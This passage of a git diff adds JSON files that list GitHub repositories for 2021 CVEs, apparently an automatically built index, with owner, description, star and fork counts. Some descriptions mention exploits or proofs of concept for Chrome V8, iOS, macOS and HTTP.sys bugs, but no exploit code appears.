+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30632.json b/2021/CVE-2021-30632.json
new file mode 100644
index 0000000000..8b91e73570
--- /dev/null
+++ b/2021/CVE-2021-30632.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 408388456,
+ "name": "PoC-CVE-2021-30632",
+ "full_name": "Phuong39\/PoC-CVE-2021-30632",
+ "owner": {
+ "login": "Phuong39",
+ "id": 84000895,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84000895?v=4",
+ "html_url": "https:\/\/github.com\/Phuong39"
+ },
+ "html_url": "https:\/\/github.com\/Phuong39\/PoC-CVE-2021-30632",
+ "description": "PoC CVE-2021-30632 - Out of bounds write in V8",
+ "fork": false,
+ "created_at": "2021-09-20T09:49:51Z",
+ "updated_at": "2024-04-02T17:40:55Z",
+ "pushed_at": "2021-09-20T09:52:06Z",
+ "stargazers_count": 74,
+ "watchers_count": 74,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 74,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 411162655,
+ "name": "CVE-2021-30632",
+ "full_name": "CrackerCat\/CVE-2021-30632",
+ "owner": {
+ "login": "CrackerCat",
+ "id": 17995064,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4",
+ "html_url": "https:\/\/github.com\/CrackerCat"
+ },
+ "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-30632",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-09-28T06:27:49Z",
+ "updated_at": "2024-05-12T17:10:15Z",
+ "pushed_at": "2021-12-13T06:02:21Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 616847234,
+ "name": "ChExp_CVE-2021-30632",
+ "full_name": "maldev866\/ChExp_CVE-2021-30632",
+ "owner": {
+ "login": "maldev866",
+ "id": 118355132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118355132?v=4",
+ "html_url": "https:\/\/github.com\/maldev866"
+ },
+ "html_url": "https:\/\/github.com\/maldev866\/ChExp_CVE-2021-30632",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-21T07:53:43Z",
+ "updated_at": "2023-03-21T07:54:36Z",
+ "pushed_at": "2023-03-21T07:58:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 750651049,
+ "name": "CVE-2021-30632",
+ "full_name": "paulsery\/CVE-2021-30632",
+ "owner": {
+ "login": "paulsery",
+ "id": 1596893,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1596893?v=4",
+ "html_url": "https:\/\/github.com\/paulsery"
+ },
+ "html_url": "https:\/\/github.com\/paulsery\/CVE-2021-30632",
+ "description": " m-y-mo: https:\/\/github.com\/github\/securitylab\/tree\/main\/SecurityExploits\/Chrome\/v8\/CVE-2021-30632",
+ "fork": false,
+ "created_at": "2024-01-31T03:28:58Z",
+ "updated_at": "2024-01-31T03:37:53Z",
+ "pushed_at": "2024-01-31T03:39:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3064.json b/2021/CVE-2021-3064.json
new file mode 100644
index 0000000000..e08a73fadf
--- /dev/null
+++ b/2021/CVE-2021-3064.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485702535,
+ "name": "CVE-2021-3064",
+ "full_name": "0xhaggis\/CVE-2021-3064",
+ "owner": {
+ "login": "0xhaggis",
+ "id": 6735009,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4",
+ "html_url": "https:\/\/github.com\/0xhaggis"
+ },
+ "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-3064",
+ "description": "Exploit for CVE-2021-3036, HTTP Smuggling + buffer overflow in PanOS 8.x",
+ "fork": false,
+ "created_at": "2022-04-26T08:41:14Z",
+ "updated_at": "2023-10-07T10:25:38Z",
+ "pushed_at": "2023-06-21T21:01:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30641.json b/2021/CVE-2021-30641.json
new file mode 100644
index 0000000000..2e5af88f91
--- /dev/null
+++ b/2021/CVE-2021-30641.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 386163197,
+ "name": "CVE-2021-30641",
+ "full_name": "dja2TaqkGEEfA45\/CVE-2021-30641",
+ "owner": {
+ "login": "dja2TaqkGEEfA45",
+ "id": 82131630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4",
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45"
+ },
+ "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-30641",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-15T04:31:58Z",
+ "updated_at": "2021-07-15T04:31:58Z",
+ "pushed_at": "2021-07-15T04:31:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30657.json b/2021/CVE-2021-30657.json
new file mode 100644
index 0000000000..795a84fbd3
--- /dev/null
+++ b/2021/CVE-2021-30657.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 425584946,
+ "name": "CVE-2021-30657",
+ "full_name": "shubham0d\/CVE-2021-30657",
+ "owner": {
+ "login": "shubham0d",
+ "id": 12750163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4",
+ "html_url": "https:\/\/github.com\/shubham0d"
+ },
+ "html_url": "https:\/\/github.com\/shubham0d\/CVE-2021-30657",
+ "description": "A sample POC for CVE-2021-30657 affecting MacOS",
+ "fork": false,
+ "created_at": "2021-11-07T18:33:35Z",
+ "updated_at": "2024-04-24T17:28:35Z",
+ "pushed_at": "2021-11-08T19:35:28Z",
+ "stargazers_count": 30,
+ "watchers_count": 30,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 30,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30682.json b/2021/CVE-2021-30682.json
new file mode 100644
index 0000000000..87c9553549
--- /dev/null
+++ b/2021/CVE-2021-30682.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 417419424,
+ "name": "csp-playground",
+ "full_name": "threatnix\/csp-playground",
+ "owner": {
+ "login": "threatnix",
+ "id": 63774126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63774126?v=4",
+ "html_url": "https:\/\/github.com\/threatnix"
+ },
+ "html_url": "https:\/\/github.com\/threatnix\/csp-playground",
+ "description": "CSP Playground for CVE-2021-30682",
+ "fork": false,
+ "created_at": "2021-10-15T08:10:02Z",
+ "updated_at": "2023-02-09T20:48:19Z",
+ "pushed_at": "2022-03-24T07:38:41Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30731.json b/2021/CVE-2021-30731.json
new file mode 100644
index 0000000000..6099892308
--- /dev/null
+++ b/2021/CVE-2021-30731.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 481094610,
+ "name": "WebcamViewer",
+ "full_name": "osy\/WebcamViewer",
+ "owner": {
+ "login": "osy",
+ "id": 50960678,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50960678?v=4",
+ "html_url": "https:\/\/github.com\/osy"
+ },
+ "html_url": "https:\/\/github.com\/osy\/WebcamViewer",
+ "description": "PoC of CVE-2021-30731",
+ "fork": false,
+ "created_at": "2022-04-13T06:13:24Z",
+ "updated_at": "2023-08-02T03:25:08Z",
+ "pushed_at": "2022-04-13T18:57:06Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30807.json b/2021/CVE-2021-30807.json
new file mode 100644
index 0000000000..d3695e556e
--- /dev/null
+++ b/2021/CVE-2021-30807.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 415412072,
+ "name": "iomfb-exploit",
+ "full_name": "jsherman212\/iomfb-exploit",
+ "owner": {
+ "login": "jsherman212",
+ "id": 42921048,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42921048?v=4",
+ "html_url": "https:\/\/github.com\/jsherman212"
+ },
+ "html_url": "https:\/\/github.com\/jsherman212\/iomfb-exploit",
+ "description": "Exploit for CVE-2021-30807",
+ "fork": false,
+ "created_at": "2021-10-09T20:11:42Z",
+ "updated_at": "2024-06-24T20:53:25Z",
+ "pushed_at": "2021-11-29T13:50:42Z",
+ "stargazers_count": 130,
+ "watchers_count": 130,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 130,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 433471856,
+ "name": "gex",
+ "full_name": "30440r\/gex",
+ "owner": {
+ "login": "30440r",
+ "id": 63462198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63462198?v=4",
+ "html_url": "https:\/\/github.com\/30440r"
+ },
+ "html_url": "https:\/\/github.com\/30440r\/gex",
+ "description": "Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB & CVE-2021-30860 exploit(s)",
+ "fork": false,
+ "created_at": "2021-11-30T14:56:04Z",
+ "updated_at": "2024-04-16T17:33:09Z",
+ "pushed_at": "2022-02-12T14:53:09Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30853.json b/2021/CVE-2021-30853.json
new file mode 100644
index 0000000000..ced504fb3b
--- /dev/null
+++ b/2021/CVE-2021-30853.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 443862591,
+ "name": "CVE-2021-30853",
+ "full_name": "shubham0d\/CVE-2021-30853",
+ "owner": {
+ "login": "shubham0d",
+ "id": 12750163,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4",
+ "html_url": "https:\/\/github.com\/shubham0d"
+ },
+ "html_url": "https:\/\/github.com\/shubham0d\/CVE-2021-30853",
+ "description": "A sample POC to test CVE-2021-30853",
+ "fork": false,
+ "created_at": "2022-01-02T20:24:11Z",
+ "updated_at": "2023-07-28T03:36:19Z",
+ "pushed_at": "2022-01-02T20:50:48Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30858.json b/2021/CVE-2021-30858.json
new file mode 100644
index 0000000000..1e6245bd08
--- /dev/null
+++ b/2021/CVE-2021-30858.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 416955164,
+ "name": "CVEREV3",
+ "full_name": "kmeps4\/CVEREV3",
+ "owner": {
+ "login": "kmeps4",
+ "id": 77245601,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77245601?v=4",
+ "html_url": "https:\/\/github.com\/kmeps4"
+ },
+ "html_url": "https:\/\/github.com\/kmeps4\/CVEREV3",
+ "description": "Testing CVE-2021-30858 Rev3",
+ "fork": false,
+ "created_at": "2021-10-14T01:51:39Z",
+ "updated_at": "2022-04-13T12:49:05Z",
+ "pushed_at": "2021-10-14T22:07:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 417176378,
+ "name": "ps4_8.00_vuln_poc",
+ "full_name": "Jeromeyoung\/ps4_8.00_vuln_poc",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/ps4_8.00_vuln_poc",
+ "description": "My take on CVE-2021-30858 for ps4 8.xx",
+ "fork": false,
+ "created_at": "2021-10-14T15:05:49Z",
+ "updated_at": "2021-10-21T14:16:32Z",
+ "pushed_at": "2021-10-14T14:13:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30860.json b/2021/CVE-2021-30860.json
new file mode 100644
index 0000000000..50f9279170
--- /dev/null
+++ b/2021/CVE-2021-30860.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 407978411,
+ "name": "CVE-2021-30860",
+ "full_name": "Levilutz\/CVE-2021-30860",
+ "owner": {
+ "login": "Levilutz",
+ "id": 22489327,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22489327?v=4",
+ "html_url": "https:\/\/github.com\/Levilutz"
+ },
+ "html_url": "https:\/\/github.com\/Levilutz\/CVE-2021-30860",
+ "description": "Scan for evidence of CVE-2021-30860 (FORCEDENTRY) exploit",
+ "fork": false,
+ "created_at": "2021-09-18T22:14:17Z",
+ "updated_at": "2024-03-08T19:05:28Z",
+ "pushed_at": "2021-09-21T04:31:01Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 441593216,
+ "name": "CVE-2021-30860",
+ "full_name": "jeffssh\/CVE-2021-30860",
+ "owner": {
+ "login": "jeffssh",
+ "id": 25801559,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25801559?v=4",
+ "html_url": "https:\/\/github.com\/jeffssh"
+ },
+ "html_url": "https:\/\/github.com\/jeffssh\/CVE-2021-30860",
+ "description": "Collection of materials relating to FORCEDENTRY",
+ "fork": false,
+ "created_at": "2021-12-25T03:00:01Z",
+ "updated_at": "2024-05-22T09:06:17Z",
+ "pushed_at": "2024-03-30T22:17:05Z",
+ "stargazers_count": 90,
+ "watchers_count": 90,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 90,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30937.json b/2021/CVE-2021-30937.json
new file mode 100644
index 0000000000..9626cebd86
--- /dev/null
+++ b/2021/CVE-2021-30937.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486636223,
+ "name": "ExploiteameEsta",
+ "full_name": "realrodri\/ExploiteameEsta",
+ "owner": {
+ "login": "realrodri",
+ "id": 40494400,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40494400?v=4",
+ "html_url": "https:\/\/github.com\/realrodri"
+ },
+ "html_url": "https:\/\/github.com\/realrodri\/ExploiteameEsta",
+ "description": "CVE-2021-30937 vulnerability checking app",
+ "fork": false,
+ "created_at": "2022-04-28T14:50:00Z",
+ "updated_at": "2022-04-28T14:52:37Z",
+ "pushed_at": "2022-04-28T18:00:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30955.json b/2021/CVE-2021-30955.json
new file mode 100644
index 0000000000..d14a4e49d0
--- /dev/null
+++ b/2021/CVE-2021-30955.json
@@ -0,0 +1,216 @@
+[
+ {
+ "id": 464524453,
+ "name": "jakeajames-CVE-2021-30955",
+ "full_name": "timb-machine-mirrors\/jakeajames-CVE-2021-30955",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/jakeajames-CVE-2021-30955",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2022-02-28T14:54:10Z",
+ "updated_at": "2023-04-08T19:23:43Z",
+ "pushed_at": "2022-02-28T14:54:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 464663598,
+ "name": "CVE-2021-30955-POC",
+ "full_name": "nickorlow\/CVE-2021-30955-POC",
+ "owner": {
+ "login": "nickorlow",
+ "id": 56371027,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56371027?v=4",
+ "html_url": "https:\/\/github.com\/nickorlow"
+ },
+ "html_url": "https:\/\/github.com\/nickorlow\/CVE-2021-30955-POC",
+ "description": "Jake Jame's proof of concept wrapped into an iOS app for CVE-2021-30955",
+ "fork": false,
+ "created_at": "2022-02-28T22:23:51Z",
+ "updated_at": "2022-06-01T11:14:21Z",
+ "pushed_at": "2022-02-28T22:27:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 464677668,
+ "name": "CVE-2021-30955-POC-IPA",
+ "full_name": "verygenericname\/CVE-2021-30955-POC-IPA",
+ "owner": {
+ "login": "verygenericname",
+ "id": 87825638,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87825638?v=4",
+ "html_url": "https:\/\/github.com\/verygenericname"
+ },
+ "html_url": "https:\/\/github.com\/verygenericname\/CVE-2021-30955-POC-IPA",
+ "description": "https:\/\/gist.github.com\/jakeajames\/37f72c58c775bfbdda3aa9575149a8aa compiled into a ipa 15.0-15.2b1",
+ "fork": false,
+ "created_at": "2022-02-28T23:28:39Z",
+ "updated_at": "2022-03-25T17:16:23Z",
+ "pushed_at": "2022-03-01T11:39:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 464887929,
+ "name": "desc_race",
+ "full_name": "b1n4r1b01\/desc_race",
+ "owner": {
+ "login": "b1n4r1b01",
+ "id": 46951815,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46951815?v=4",
+ "html_url": "https:\/\/github.com\/b1n4r1b01"
+ },
+ "html_url": "https:\/\/github.com\/b1n4r1b01\/desc_race",
+ "description": "iOS 15.1 kernel exploit POC for CVE-2021-30955",
+ "fork": false,
+ "created_at": "2022-03-01T12:41:03Z",
+ "updated_at": "2024-06-08T02:33:47Z",
+ "pushed_at": "2022-03-01T16:11:31Z",
+ "stargazers_count": 253,
+ "watchers_count": 253,
+ "has_discussions": false,
+ "forks_count": 45,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 45,
+ "watchers": 253,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 469611099,
+ "name": "desc_race_A15",
+ "full_name": "markie-dev\/desc_race_A15",
+ "owner": {
+ "login": "markie-dev",
+ "id": 34432591,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34432591?v=4",
+ "html_url": "https:\/\/github.com\/markie-dev"
+ },
+ "html_url": "https:\/\/github.com\/markie-dev\/desc_race_A15",
+ "description": "CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices (A14-A15)",
+ "fork": false,
+ "created_at": "2022-03-14T06:42:45Z",
+ "updated_at": "2024-01-16T13:35:13Z",
+ "pushed_at": "2022-03-14T07:58:37Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 470172833,
+ "name": "desc_race",
+ "full_name": "Dylbin\/desc_race",
+ "owner": {
+ "login": "Dylbin",
+ "id": 94767639,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94767639?v=4",
+ "html_url": "https:\/\/github.com\/Dylbin"
+ },
+ "html_url": "https:\/\/github.com\/Dylbin\/desc_race",
+ "description": "desc_race exploit for iOS 15.0 - 15.1.1 (with stable kernel r\/w primitives) (CVE-2021-30955) ",
+ "fork": false,
+ "created_at": "2022-03-15T13:30:38Z",
+ "updated_at": "2024-05-27T20:46:33Z",
+ "pushed_at": "2022-04-15T21:22:07Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 471360094,
+ "name": "Pentagram-exploit-tester",
+ "full_name": "GeoSn0w\/Pentagram-exploit-tester",
+ "owner": {
+ "login": "GeoSn0w",
+ "id": 15067741,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15067741?v=4",
+ "html_url": "https:\/\/github.com\/GeoSn0w"
+ },
+ "html_url": "https:\/\/github.com\/GeoSn0w\/Pentagram-exploit-tester",
+ "description": "A test app to check if your device is vulnerable to CVE-2021-30955",
+ "fork": false,
+ "created_at": "2022-03-18T12:32:10Z",
+ "updated_at": "2024-05-27T03:20:42Z",
+ "pushed_at": "2023-10-12T14:45:58Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "hacktoberfest",
+ "ios"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-30956.json b/2021/CVE-2021-30956.json
new file mode 100644
index 0000000000..a7c6a7076b
--- /dev/null
+++ b/2021/CVE-2021-30956.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 498628601,
+ "name": "CVE-2021-30956",
+ "full_name": "fordsham\/CVE-2021-30956",
+ "owner": {
+ "login": "fordsham",
+ "id": 78381983,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78381983?v=4",
+ "html_url": "https:\/\/github.com\/fordsham"
+ },
+ "html_url": "https:\/\/github.com\/fordsham\/CVE-2021-30956",
+ "description": "Phone number notification bug",
+ "fork": false,
+ "created_at": "2022-06-01T07:09:18Z",
+ "updated_at": "2022-06-01T07:09:18Z",
+ "pushed_at": "2022-06-01T08:09:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31159.json b/2021/CVE-2021-31159.json
new file mode 100644
index 0000000000..d62fd3ce3a
--- /dev/null
+++ b/2021/CVE-2021-31159.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 349519809,
+ "name": "CVE-2021-31159",
+ "full_name": "ricardojoserf\/CVE-2021-31159",
+ "owner": {
+ "login": "ricardojoserf",
+ "id": 11477353,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11477353?v=4",
+ "html_url": "https:\/\/github.com\/ricardojoserf"
+ },
+ "html_url": "https:\/\/github.com\/ricardojoserf\/CVE-2021-31159",
+ "description": "Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159) - https:\/\/ricardojoserf.github.io\/CVE-2021-31159\/",
+ "fork": false,
+ "created_at": "2021-03-19T18:28:43Z",
+ "updated_at": "2023-09-28T11:25:56Z",
+ "pushed_at": "2021-06-16T16:21:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "manageengine-servicedesk",
+ "servicedeskplus"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31166.json b/2021/CVE-2021-31166.json
new file mode 100644
index 0000000000..9a0f1cd2a1
--- /dev/null
+++ b/2021/CVE-2021-31166.json
@@ -0,0 +1,401 @@
+[
+ {
+ "id": 367930039,
+ "name": "CVE-2021-31166",
+ "full_name": "0vercl0k\/CVE-2021-31166",
+ "owner": {
+ "login": "0vercl0k",
+ "id": 1476421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4",
+ "html_url": "https:\/\/github.com\/0vercl0k"
+ },
+ "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-31166",
+ "description": "Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.",
+ "fork": false,
+ "created_at": "2021-05-16T16:15:56Z",
+ "updated_at": "2024-06-21T08:44:01Z",
+ "pushed_at": "2021-06-12T08:27:09Z",
+ "stargazers_count": 821,
+ "watchers_count": 821,
+ "has_discussions": false,
+ "forks_count": 139,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "accept-encoding",
+ "cve-2021-31166",
+ "http",
+ "ulpparsecontentcoding"
+ ],
+ "visibility": "public",
+ "forks": 139,
+ "watchers": 821,
+ "score": 0,
+ "subscribers_count": 24
+ },
+ {
+ "id": 368156601,
+ "name": "CVE-2021-31166",
+ "full_name": "zha0gongz1\/CVE-2021-31166",
